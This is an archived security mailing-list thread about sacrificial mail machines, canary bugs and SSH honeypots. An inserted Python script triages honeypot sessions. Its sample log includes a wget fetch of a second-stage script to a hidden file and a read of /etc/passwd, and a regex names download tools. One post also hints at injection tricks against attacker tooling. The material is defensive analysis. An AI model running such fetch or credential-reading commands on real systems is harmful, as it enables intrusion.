On 2/3/15, dan@geer.org <dan@geer.org> wrote:
... John, you know this I'm sure, but for the record the highest security places use sacrificial machines to receive e-mail and the like, to print said transmissions to paper, and then those (sacrificial) machines are sacrificed, which is to say they are reloaded/rebooted. Per message. The printed forms then cross an air gap and those are scanned before transmission to a final destination on networks of a highly controlled sort. I suspect, but do not know, that the sacrificial machines are thoroughly instrumented in the countermeasure sense.
this is defense to depths layered through hard experience lessons ;)
... For the entities of which I speak, the avoidance of silent failure is taken seriously -- which brings us 'round to your (and my) core belief: The sine qua non goal of security engineering is "No Silent Failure."
there was an interesting thread here last year on instrumenting runtimes to appear stock (vulnerable) but which fail in obvious ways when subversion is attempted. (after all, being able to observe an attack is the first step in defending against such a class...) "hack it first yourself, before your attacker does..."
On 3 Feb 2015 19:19, "coderman" <coderman@gmail.com> wrote:
"hack it first yourself, before your attacker does..."
Canary bugs / honeypot bugs?
Proven tradition out in the wild. I gather there are SSH honeypots that allow logins with trivial attempts (pi/raspberry, admin/admin..), then simply record which commands the attacker runs first. Usually they'll be scripted commands to scope out the compromised system, and if it passes muster it dials home. I don't think those honeypots are designed to make much of a human attacker, but they allow rapid identification and classification of who's attacking and offer some scope for countermeasures. For example, if your attacker is running a certain command and capturing a certain form of expected output, what happens if your honeypot gives it too much, or a different kind of output? :) Is your automated attacker using SQL to store attack data? I hope it's escaping input.. Is your attacker using stars in any commands ('grep foobar *')? Did you know you can have filenames that look like shell command flags and bash will uncritically pass them as arguments?

On 03/02/15 18:55, Natanael wrote:
On 3 Feb 2015 19:19, "coderman" <coderman@gmail.com> wrote:
"hack it first yourself, before your attacker does..."
Canary bugs / honeypot bugs?
-- Scientific Director, IndieBio Irish Programme
Twitter: @onetruecathal
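The triage Cathal describes, as an added example that is not part of the thread: sort honeypot sessions by whether their first commands arrive faster than a human could type them, and note whether the session reached out for a second stage ("dials home"). The log format (`<epoch> <session-id> <command>`), the sample lines and the 0.5 s typing threshold are all constructed assumptions, not any real honeypot's output.

```python
"""Classify SSH honeypot sessions from the first commands they run.
Added example with a constructed log format: '<epoch> <session-id> <command>'."""
import re
from collections import defaultdict

# Constructed sample log, modelled on what a low-interaction SSH honeypot records.
SAMPLE_LOG = """\
1422985200.01 s1 uname -a
1422985200.03 s1 cat /proc/cpuinfo | grep name | wc -l
1422985200.05 s1 ls -lh $(which ls)
1422985200.09 s1 wget -q http://203.0.113.7/stage2.sh -O /tmp/.x
1422985260.00 s2 ls -la
1422985271.50 s2 cat /etc/passwd
1422985290.20 s2 w
"""

LINE_RE = re.compile(r"^(\d+(?:\.\d+)?) (\S+) (.+)$")
# Commands that fetch a second stage; their presence is the "dials home" step.
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
HUMAN_GAP_S = 0.5   # assumption: gaps shorter than this between commands are not a typist

def parse_sessions(log_text):
    """Group (timestamp, command) pairs by session id, preserving log order."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue          # skip malformed lines rather than fail the whole run
        ts, sid, cmd = m.groups()
        sessions[sid].append((float(ts), cmd))
    return sessions

def classify(commands):
    """Describe one session: scripted or interactive, first command, fetch command if any."""
    gaps = [b[0] - a[0] for a, b in zip(commands, commands[1:])]
    scripted = bool(gaps) and max(gaps) < HUMAN_GAP_S
    fetch = [c for _, c in commands if FETCH_RE.search(c)]
    return {
        "scripted": scripted,
        "first_cmd": commands[0][1] if commands else None,
        "dials_home": fetch[0] if fetch else None,
    }

def classify_log(log_text):
    return {sid: classify(cmds) for sid, cmds in parse_sessions(log_text).items()}
```

Session s1 in the sample is flagged as scripted reconnaissance that then fetches a second stage; s2, with multi-second gaps and no fetch, reads as an interactive login.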
On 02/03/2015 10:55 AM, Natanael wrote:
"hack it first yourself, before your attacker does..." Canary bugs / honeypot bugs?
"What would I do if I wanted to crack us...?"

-- The Doctor [412/724/301/703/415] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ IHOP: The world's largest, most popular goth club.
participants (4)
- Cathal Garvey
- coderman
- Natanael
- The Doctor